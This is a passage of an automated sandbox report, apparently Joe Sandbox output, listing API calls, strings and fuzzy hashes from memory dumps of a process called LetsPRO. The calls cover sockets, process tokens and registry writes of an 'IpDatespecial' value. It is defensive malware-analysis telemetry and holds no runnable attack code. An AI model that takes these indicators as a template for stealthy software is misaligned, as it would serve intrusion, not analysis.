                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: lstrcmpilstrcpy$DeviceQuery__wcsnicmplstrcatlstrlen
                                        • String ID: A:\$B:\
                                        • API String ID: 4249875308-1009255891
                                        • Opcode ID: fed2c51ee9a7354a5e6abd8b4443466e8befe2f82b7e5d4bb337f26988d5e2ca
                                        • Instruction ID: 57c2c628f6283f2965afa9518597a6f3d10ea0ee775153e7b002a84944fea6e2
                                        • Opcode Fuzzy Hash: fed2c51ee9a7354a5e6abd8b4443466e8befe2f82b7e5d4bb337f26988d5e2ca
                                        • Instruction Fuzzy Hash: 12115E71A01219EBDB24EFA0DD54BEEB378EF45310F044598EE0AB7140E774EA09CBA5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,1A93E2E0,00000000,?,?,?,00000000,03F5125B,000000FF,?,03F3E04E,00000000), ref: 03F39773
                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(03F3E1AE,00000000,?,?,?,00000000,03F5125B,000000FF,?,03F3E04E), ref: 03F39812
                                        • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,03F5125B,000000FF,?,03F3E04E), ref: 03F39850
                                        • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,03F5125B,000000FF,?,03F3E04E), ref: 03F39875
                                        • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,03F5125B,000000FF,?,03F3E04E), ref: 03F3989A
                                          • Part of subcall function 03F31280: __CxxThrowException@8.LIBCMT ref: 03F31290
                                          • Part of subcall function 03F31280: DeleteCriticalSection.KERNEL32(00000000,03F3D3E6,03F56624,?,?,03F3D3E6,?,?,?,?,03F55A40,00000000), ref: 03F312A1
                                          • Part of subcall function 03F3CE10: InitializeCriticalSectionAndSpinCount.KERNEL32(03F3E076,00000000,1A93E2E0,03F3E04E,75922F60,00000000,?,03F3E226,03F5110B,000000FF,?,03F3994A,03F3E226), ref: 03F3CE67
                                          • Part of subcall function 03F3CE10: InitializeCriticalSectionAndSpinCount.KERNEL32(03F3E08E,00000000,?,03F3E226,03F5110B,000000FF,?,03F3994A,03F3E226,?,?,?,00000000,03F5125B,000000FF), ref: 03F3CE83
                                        • InterlockedExchange.KERNEL32(03F3E066,00000000), ref: 03F399A0
                                        • timeGetTime.WINMM(?,?,?,00000000,03F5125B,000000FF,?,03F3E04E), ref: 03F399A6
                                        • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,00000000,03F5125B,000000FF,?,03F3E04E), ref: 03F399B4
                                        • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,03F5125B,000000FF,?,03F3E04E), ref: 03F399BD
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: CreateEvent$CriticalSection$CountInitializeSpin$DeleteException@8ExchangeInterlockedThrowTimetime
                                        • String ID:
                                        • API String ID: 1400036169-0
                                        • Opcode ID: 48ffba30c4722bb4ceb86b78197256730aef12d0221991834177b9355d6a9611
                                        • Instruction ID: 1d5a55b21d7f2e2cc64c6963b9684b4e1d612722d6dba9c0403dd725fdb84a20
                                        • Opcode Fuzzy Hash: 48ffba30c4722bb4ceb86b78197256730aef12d0221991834177b9355d6a9611
                                        • Instruction Fuzzy Hash: FE81D5B1A05B46BFE344DF7A888479AFBA8FB09304F50462EE12CD7640D774A964CF90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • SetLastError.KERNEL32(0000139F,?), ref: 025F4E79
                                        • RtlTryEnterCriticalSection.NTDLL(?), ref: 025F4E98
                                        • RtlTryEnterCriticalSection.NTDLL(?), ref: 025F4EA2
                                        • SetLastError.KERNEL32(0000139F), ref: 025F4EB9
                                        • RtlLeaveCriticalSection.NTDLL(?), ref: 025F4EC2
                                        • RtlLeaveCriticalSection.NTDLL(?), ref: 025F4EC9
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3270208033.00000000025F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 025F0000, based on PE: true
                                        • Associated: 00000004.00000002.3270208033.000000000260F000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_25f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: CriticalSection$EnterErrorLastLeave
                                        • String ID:
                                        • API String ID: 4082018349-0
                                        • Opcode ID: 2ba1e6a00c57339598d53d71e46ee7d3bb1d405935f4d72ebf910e0307c0c968
                                        • Instruction ID: c34e722f4973845d5329614ff6de4270ec04d8ea125edb6aaf874a1525fb4db9
                                        • Opcode Fuzzy Hash: 2ba1e6a00c57339598d53d71e46ee7d3bb1d405935f4d72ebf910e0307c0c968
                                        • Instruction Fuzzy Hash: 3A1186327003048BC720EA79EC84A6FB7ECFB88325B400A2AE746C7540E771D854CBA6
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • GetCurrentProcessId.KERNEL32(1A93E2E0,00000000,00000000,75A773E0,?,00000000,03F510DB,000000FF,?,03F36AB3,00000000), ref: 03F36938
                                        • OpenProcess.KERNEL32(00000400,00000000,00000000,?,00000000,03F510DB,000000FF,?,03F36AB3,00000000), ref: 03F36947
                                        • OpenProcessToken.ADVAPI32(00000000,00000008,00000000,?,00000000,03F510DB,000000FF,?,03F36AB3,00000000), ref: 03F36960
                                        • CloseHandle.KERNEL32(00000000,?,00000000,03F510DB,000000FF,?,03F36AB3,00000000), ref: 03F3696B
                                        • SysStringLen.OLEAUT32(00000000), ref: 03F369BE
                                        • SysStringLen.OLEAUT32(00000000), ref: 03F369CC
                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,03F510DB,000000FF), ref: 03F36A2E
                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,03F510DB,000000FF), ref: 03F36A34
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: CloseHandleProcess$OpenString$CurrentToken
                                        • String ID:
                                        • API String ID: 429299433-0
                                        • Opcode ID: 0402eb12b4e7c85be5ea379d88430dc315213038f7d17f35ceee2d1ad931ab9b
                                        • Instruction ID: 60d66a0ba2501b8fd10cebc4091714bfdbad2f0397688bbd872ce548766932c8
                                        • Opcode Fuzzy Hash: 0402eb12b4e7c85be5ea379d88430dc315213038f7d17f35ceee2d1ad931ab9b
                                        • Instruction Fuzzy Hash: DA41A7B6D40219AFDB10EFA9CC80AAEF7F8FB45710F14466AE915F7240D7759900CBA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • GetCurrentThreadId.KERNEL32 ref: 03F33F65
                                        • SetLastError.KERNEL32(0000139F,?,7591DFA0,03F33648), ref: 03F34054
                                          • Part of subcall function 03F32BC0: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 03F32BD6
                                          • Part of subcall function 03F32BC0: SwitchToThread.KERNEL32 ref: 03F32BEA
                                        • send.WS2_32(?,03F549C0,00000010,00000000), ref: 03F33FC6
                                        • SetEvent.KERNEL32(?), ref: 03F33FE9
                                        • InterlockedExchange.KERNEL32(?,00000000), ref: 03F33FF5
                                        • WSACloseEvent.WS2_32(?), ref: 03F34003
                                        • shutdown.WS2_32(?,00000001), ref: 03F3401B
                                        • closesocket.WS2_32(?), ref: 03F34025
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: EventExchangeInterlockedThread$CloseCompareCurrentErrorLastSwitchclosesocketsendshutdown
                                        • String ID:
                                        • API String ID: 3254528666-0
                                        • Opcode ID: 23869e170015b537dfd4ed626a9ed9680bea6c7f9159060d9c44ea69dc68e7cb
                                        • Instruction ID: c399848401c55218e4ae7b10708825effa8d82f39c7519b87f59ef0493e82dd5
                                        • Opcode Fuzzy Hash: 23869e170015b537dfd4ed626a9ed9680bea6c7f9159060d9c44ea69dc68e7cb
                                        • Instruction Fuzzy Hash: BF215A75600705ABD334EF79D888B9BB7F9BB45711F080E1DE69287A90C7B9E441CB50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • EnterCriticalSection.KERNEL32(?,?,00000000,03F34039,?,7591DFA0,03F33648), ref: 03F34074
                                        • ResetEvent.KERNEL32(?,?,00000000,03F34039,?,7591DFA0,03F33648), ref: 03F34087
                                        • ResetEvent.KERNEL32(?,?,00000000,03F34039,?,7591DFA0,03F33648), ref: 03F34090
                                        • ResetEvent.KERNEL32(?,?,00000000,03F34039,?,7591DFA0,03F33648), ref: 03F34099
                                          • Part of subcall function 03F31350: HeapFree.KERNEL32(?,00000000,?,?,?,03F340A6,?,00000000,03F34039,?,7591DFA0,03F33648), ref: 03F31390
                                          • Part of subcall function 03F31420: HeapFree.KERNEL32(?,00000000,?,?,?,03F340B1,?,00000000,03F34039,?,7591DFA0,03F33648), ref: 03F3143D
                                          • Part of subcall function 03F31420: _free.LIBCMT ref: 03F31459
                                        • HeapDestroy.KERNEL32(?,?,00000000,03F34039,?,7591DFA0,03F33648), ref: 03F340B9
                                        • HeapCreate.KERNEL32(?,?,?,?,00000000,03F34039,?,7591DFA0,03F33648), ref: 03F340D4
                                        • SetEvent.KERNEL32(?,?,00000000,03F34039,?,7591DFA0,03F33648), ref: 03F34150
                                        • LeaveCriticalSection.KERNEL32(?,?,00000000,03F34039,?,7591DFA0,03F33648), ref: 03F34157
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: EventHeap$Reset$CriticalFreeSection$CreateDestroyEnterLeave_free
                                        • String ID:
                                        • API String ID: 1219087420-0
                                        • Opcode ID: 8c100ab3de36ca01f1776945d61b1df906a6dc6065177637c68a10fc55e6d952
                                        • Instruction ID: 557ac9aed69b554eaaf6763e549102ca23adb69502a6707249ceb1f4db550f4e
                                        • Opcode Fuzzy Hash: 8c100ab3de36ca01f1776945d61b1df906a6dc6065177637c68a10fc55e6d952
                                        • Instruction Fuzzy Hash: 74314775200A06AFD705EF39DC98B96F7A8FF49310F048659E5298B250CB35B811CFD0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                          • Part of subcall function 03F31610: __vswprintf.LIBCMT ref: 03F31646
                                        • _malloc.LIBCMT ref: 03F32330
                                          • Part of subcall function 03F3F673: __FF_MSGBANNER.LIBCMT ref: 03F3F68C
                                          • Part of subcall function 03F3F673: __NMSG_WRITE.LIBCMT ref: 03F3F693
                                          • Part of subcall function 03F3F673: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,03F44500,00000000,00000001,00000000,?,03F48DE6,00000018,03F56448,0000000C,03F48E76), ref: 03F3F6B8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: AllocateHeap__vswprintf_malloc
                                        • String ID: [RI] %d bytes$input ack: sn=%lu rtt=%ld rto=%ld$input probe$input psh: sn=%lu ts=%lu$input wins: %lu
                                        • API String ID: 3723585974-868042568
                                        • Opcode ID: 38cb5c742c89e28be066277f6fd37dde970e6c20ee41524badc4cbfae82990b0
                                        • Instruction ID: 8e5fee0726100420d79714d79edee4d8598f7ea95d4e989e21c8064d6404e4b8
                                        • Opcode Fuzzy Hash: 38cb5c742c89e28be066277f6fd37dde970e6c20ee41524badc4cbfae82990b0
                                        • Instruction Fuzzy Hash: 8AB1B175E00205AFCF18DF69D880AAEB7A5BF86310F0849BEDD199B346D731D941CB91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _free.LIBCMT ref: 03F31878
                                        • _free.LIBCMT ref: 03F318B6
                                        • _free.LIBCMT ref: 03F318F5
                                        • _free.LIBCMT ref: 03F31935
                                        • _free.LIBCMT ref: 03F3195D
                                        • _free.LIBCMT ref: 03F31981
                                        • _free.LIBCMT ref: 03F319B9
                                          • Part of subcall function 03F3F639: RtlFreeHeap.NTDLL(00000000,00000000,?,03F43E4C,00000000,?,03F44500,00000000,00000001,00000000,?,03F48DE6,00000018,03F56448,0000000C,03F48E76), ref: 03F3F64F
                                          • Part of subcall function 03F3F639: GetLastError.KERNEL32(00000000,?,03F43E4C,00000000,?,03F44500,00000000,00000001,00000000,?,03F48DE6,00000018,03F56448,0000000C,03F48E76,00000000), ref: 03F3F661
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID:
                                        • API String ID: 776569668-0
                                        • Opcode ID: cf497c8a5661fb8c0fc8d532887530d656547491ba25e2415408295c4792faec
                                        • Instruction ID: 36c0af1022bd819413534ce6ac59bbbbf1a3984cc04b301d981e8a6387c2007d
                                        • Opcode Fuzzy Hash: cf497c8a5661fb8c0fc8d532887530d656547491ba25e2415408295c4792faec
                                        • Instruction Fuzzy Hash: DF512E76A01215CFD714EF58D584869BBA6FF8A31471980ADC51A5F321C732AD42CF91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • GetCurrentThreadId.KERNEL32 ref: 03F33883
                                        • SetWaitableTimer.KERNEL32(?,?,?,00000000,00000000,00000000,?,00000000,FFFFD8F0,000000FF), ref: 03F338C4
                                        • WSAWaitForMultipleEvents.WS2_32(00000004,?,00000000,000000FF,00000000), ref: 03F33931
                                        • GetCurrentThreadId.KERNEL32 ref: 03F3395C
                                        • GetLastError.KERNEL32(?,00000000,000000FF,00000000), ref: 03F339F4
                                        • SetLastError.KERNEL32(0000139F,?,00000000,000000FF,00000000), ref: 03F33A22
                                        • WSAGetLastError.WS2_32(?,00000000,000000FF,00000000), ref: 03F33A39
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: ErrorLast$CurrentThread$EventsMultipleTimerWaitWaitable
                                        • String ID:
                                        • API String ID: 3058130114-0
                                        • Opcode ID: 1003ef9220c9bbdb50e4db2be793b70659fa256b525b47553638a3f6bdbfd194
                                        • Instruction ID: 9f6ec38d8be1f0d8890e83cfb70d83ba9d249c61f0c3f50efa8dd7ae67d2eafa
                                        • Opcode Fuzzy Hash: 1003ef9220c9bbdb50e4db2be793b70659fa256b525b47553638a3f6bdbfd194
                                        • Instruction Fuzzy Hash: F451A278A05706DBDB20DF24CD84BAAB7E9FF06714F14491AD95ADB680DB34F940CB41
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • RegOpenKeyExW.ADVAPI32(80000001,Console,00000000,00000002), ref: 03F3B7A7
                                        • RegDeleteValueW.ADVAPI32(?,IpDatespecial), ref: 03F3B7B7
                                        • RegSetValueExW.ADVAPI32(?,IpDatespecial,00000000,00000003,?,00000004), ref: 03F3B7CE
                                        • RegCloseKey.ADVAPI32(?,?,00000004), ref: 03F3B7D9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Value$CloseDeleteOpen
                                        • String ID: Console$IpDatespecial
                                        • API String ID: 3183427449-1840232981
                                        • Opcode ID: 7d6339bda88f0fff514e3f0524570429ab08f8fe201bd47480dca2480fd89f33
                                        • Instruction ID: 052282bc4c75024236999af0d80f821b74063b2cb9cfea8eae93b7e1b0e37947
                                        • Opcode Fuzzy Hash: 7d6339bda88f0fff514e3f0524570429ab08f8fe201bd47480dca2480fd89f33
                                        • Instruction Fuzzy Hash: 69F08272245344BFD3249760AC5AF5ABB54F789711F504A0DFB8569181C661E100C655
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • __getptd.LIBCMT ref: 03F5031D
                                          • Part of subcall function 03F43E5B: __getptd_noexit.LIBCMT ref: 03F43E5E
                                          • Part of subcall function 03F43E5B: __amsg_exit.LIBCMT ref: 03F43E6B
                                        • __getptd.LIBCMT ref: 03F5032E
                                        • __getptd.LIBCMT ref: 03F5033C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: __getptd$__amsg_exit__getptd_noexit
                                        • String ID: MOC$RCC$csm
                                        • API String ID: 803148776-2671469338
                                        • Opcode ID: a1f0d33c8d38bd48e94782b4de51ff7935ea793739f44933f6f473294c896614
                                        • Instruction ID: 2dd8edc6f3947767b8873cd8a6ba70b53010c04c158dcb8312e3232e00bf0223
                                        • Opcode Fuzzy Hash: a1f0d33c8d38bd48e94782b4de51ff7935ea793739f44933f6f473294c896614
                                        • Instruction Fuzzy Hash: 7DE09239914207CFD720DBA8C54AB683AD9BB54715F5944B2E90CCF221DB38D5948552
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • EnterCriticalSection.KERNEL32(000002FF), ref: 03F350CA
                                        • WSASetLastError.WS2_32(0000139F), ref: 03F350E2
                                        • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,?,00000000,000000FF), ref: 03F350EC
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: CriticalSection$EnterErrorLastLeave
                                        • String ID:
                                        • API String ID: 4082018349-0
                                        • Opcode ID: 34a61ab227068852d15488eee90b4ab37111d942016d6dca54187d69b92b52e4
                                        • Instruction ID: bd3e916f29bf94e65e81b1f8fa8c12e1638190fb86cb355259666afcdc6ce07c
                                        • Opcode Fuzzy Hash: 34a61ab227068852d15488eee90b4ab37111d942016d6dca54187d69b92b52e4
                                        • Instruction Fuzzy Hash: 24317E76A04749ABD714EF55DD85B6AB3A8EB8A710F004A5EFD1AC7780E736E800CB50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • __getptd.LIBCMT ref: 03F44891
                                          • Part of subcall function 03F43E5B: __getptd_noexit.LIBCMT ref: 03F43E5E
                                          • Part of subcall function 03F43E5B: __amsg_exit.LIBCMT ref: 03F43E6B
                                        • __amsg_exit.LIBCMT ref: 03F448B1
                                        • __lock.LIBCMT ref: 03F448C1
                                        • InterlockedDecrement.KERNEL32(?), ref: 03F448DE
                                        • _free.LIBCMT ref: 03F448F1
                                        • InterlockedIncrement.KERNEL32(041C15B8), ref: 03F44909
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                        • String ID:
                                        • API String ID: 3470314060-0
                                        • Opcode ID: aded343760bc3c007a7a82441fef24b3bbb3e8bc27e086e6022c84ee2ac28d81
                                        • Instruction ID: c8523e5c8357121660abbbcde01ea975d163b121a7775932ffda8520f6f9408c
                                        • Opcode Fuzzy Hash: aded343760bc3c007a7a82441fef24b3bbb3e8bc27e086e6022c84ee2ac28d81
                                        • Instruction Fuzzy Hash: 2401F536D02756EBE724FF66980479EBFA0BF04B10F080115EA14BB684DB789481CBD2
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • DeleteObject.GDI32(?), ref: 03F39BD2
                                        • EnterCriticalSection.KERNEL32(03F5FB64,?,?,?,03F39B7B), ref: 03F39BE3
                                        • EnterCriticalSection.KERNEL32(03F5FB64,?,?,?,03F39B7B), ref: 03F39BF8
                                        • GdiplusShutdown.GDIPLUS(00000000,?,?,?,03F39B7B), ref: 03F39C04
                                        • LeaveCriticalSection.KERNEL32(03F5FB64,?,?,?,03F39B7B), ref: 03F39C15
                                        • LeaveCriticalSection.KERNEL32(03F5FB64,?,?,?,03F39B7B), ref: 03F39C1C
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: CriticalSection$EnterLeave$DeleteGdiplusObjectShutdown
                                        • String ID:
                                        • API String ID: 4268643673-0
                                        • Opcode ID: f9b217120b20ca0cb8b7966473598c4715be39afd9237804c33c8f9529367f18
                                        • Instruction ID: 65f779b99dc1b718cc749e89453a89c6214e3b003f9972eee5f55139472ca6de
                                        • Opcode Fuzzy Hash: f9b217120b20ca0cb8b7966473598c4715be39afd9237804c33c8f9529367f18
                                        • Instruction Fuzzy Hash: 85012CB590130AFFC704EF6AD8A0419BBA4FE4921532486EEE619CB316C3B2C403CF95
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 03F348E1
                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 03F348EC
                                        • Sleep.KERNEL32(00000258), ref: 03F348F9
                                        • CloseHandle.KERNEL32(?), ref: 03F34914
                                        • CloseHandle.KERNEL32(?), ref: 03F3491D
                                        • Sleep.KERNEL32(0000012C), ref: 03F3492E
                                          • Part of subcall function 03F33F60: GetCurrentThreadId.KERNEL32 ref: 03F33F65
                                          • Part of subcall function 03F33F60: send.WS2_32(?,03F549C0,00000010,00000000), ref: 03F33FC6
                                          • Part of subcall function 03F33F60: SetEvent.KERNEL32(?), ref: 03F33FE9
                                          • Part of subcall function 03F33F60: InterlockedExchange.KERNEL32(?,00000000), ref: 03F33FF5
                                          • Part of subcall function 03F33F60: WSACloseEvent.WS2_32(?), ref: 03F34003
                                          • Part of subcall function 03F33F60: shutdown.WS2_32(?,00000001), ref: 03F3401B
                                          • Part of subcall function 03F33F60: closesocket.WS2_32(?), ref: 03F34025
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Close$EventHandleObjectSingleSleepWait$CurrentExchangeInterlockedThreadclosesocketsendshutdown
                                        • String ID:
                                        • API String ID: 1019945655-0
                                        • Opcode ID: 7f352deec9e367c7eca51a21f72f699fa240b5fc291c1db6f57c6242f685dae2
                                        • Instruction ID: 6334e006153f3c4630a9f5e2ef24dc068d2db758429189a4f03c2af0d820b111
                                        • Opcode Fuzzy Hash: 7f352deec9e367c7eca51a21f72f699fa240b5fc291c1db6f57c6242f685dae2
                                        • Instruction Fuzzy Hash: E1F036762047196BD614EB69DC84D46F3E9EFC9720B154B09E26587294CA75E801CB90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 03F33311
                                        • Sleep.KERNEL32(00000258), ref: 03F3331E
                                        • InterlockedExchange.KERNEL32(?,00000000), ref: 03F33326
                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 03F33332
                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 03F3333A
                                        • Sleep.KERNEL32(0000012C), ref: 03F3334B
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: ObjectSingleWait$Sleep$ExchangeInterlocked
                                        • String ID:
                                        • API String ID: 3137405945-0
                                        • Opcode ID: 476d63cc4b0b1b4371a4e8d8e5b7fe1c62dd7bcdf8ec8148161350cd1f199035
                                        • Instruction ID: 07b5f8eae9941a99cbba13a617a36fe4f0067a33cddbc5991462bc031b442c06
                                        • Opcode Fuzzy Hash: 476d63cc4b0b1b4371a4e8d8e5b7fe1c62dd7bcdf8ec8148161350cd1f199035
                                        • Instruction Fuzzy Hash: D7F012762047186BD610ABA9DC84D56F3E8AF99734B204B09F365932D4CAB5E801CBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ___BuildCatchObject.LIBCMT ref: 03F5096E
                                          • Part of subcall function 03F508C9: ___BuildCatchObjectHelper.LIBCMT ref: 03F508FF
                                        • _UnwindNestedFrames.LIBCMT ref: 03F50985
                                        • ___FrameUnwindToState.LIBCMT ref: 03F50993
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                        • String ID: csm$csm
                                        • API String ID: 2163707966-3733052814
                                        • Opcode ID: a4ec08a577bcb042cc7356b16b645f83b0b4d35d15726398ffe3570c0dbe416a
                                        • Instruction ID: 7b0cb3325616a8b24e3a8f9dbb74c9d5ebc9ea60291e721646c15ffafed00c9a
                                        • Opcode Fuzzy Hash: a4ec08a577bcb042cc7356b16b645f83b0b4d35d15726398ffe3570c0dbe416a
                                        • Instruction Fuzzy Hash: 0101FB7540120ABBDF12AF51CD44EAABF6AFF09350F044014FE5819224DB36D9B1DBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • RegOpenKeyExW.ADVAPI32(80000001,Console,00000000,00000002), ref: 03F3B800
                                        • RegDeleteValueW.ADVAPI32(?,IpDatespecial), ref: 03F3B810
                                        • RegCloseKey.ADVAPI32(?), ref: 03F3B81B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: CloseDeleteOpenValue
                                        • String ID: Console$IpDatespecial
